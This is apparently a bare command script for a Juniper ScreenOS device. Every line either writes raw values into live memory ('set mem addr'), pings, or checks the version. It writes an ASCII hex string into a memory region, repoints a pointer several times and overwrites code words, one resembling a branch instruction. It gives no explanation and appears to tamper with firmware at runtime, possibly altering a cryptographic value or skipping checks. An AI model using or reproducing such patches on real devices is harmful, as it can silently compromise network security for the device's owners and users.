set mem addr 0x19603d4 0x000636f0
ping
set mem addr 0x1a81c70 0x4d333241
set mem addr 0x1a81c74 0x3735382c
set mem addr 0x1a81c78 0x3031653a
set mem addr 0x1a81c7c 0x33443230
set mem addr 0x1a81c80 0x30303334
set mem addr 0x1a81c84 0x33383630
set mem addr 0x1a81c88 0x34383030
set mem addr 0x1a81c8c 0x62303639
set mem addr 0x1a81c90 0x33336434
set mem addr 0x1a81c94 0x33643230
set mem addr 0x1a81c98 0x30303661
set mem addr 0x1a81c9c 0x36313239
set mem addr 0x1a81ca0 0x39363563
set mem addr 0x1a81ca4 0x37643238
set mem addr 0x1a81ca8 0x30336136
set mem addr 0x1a81cac 0x34653830
set mem addr 0x1a81cb0 0x30303230
set mem addr 0x1a81cb4 0x00000000
set mem addr 0x19603d4 0x0032a5a4
get tech | in juniper
ping
set mem addr 0x636d0 0x60630300
set mem addr 0x19603d4 0x000636f0
get tech | in juniper
ping
set mem addr 0x342a88 0x48000014
set mem addr 0x19603d4 0x00651c14
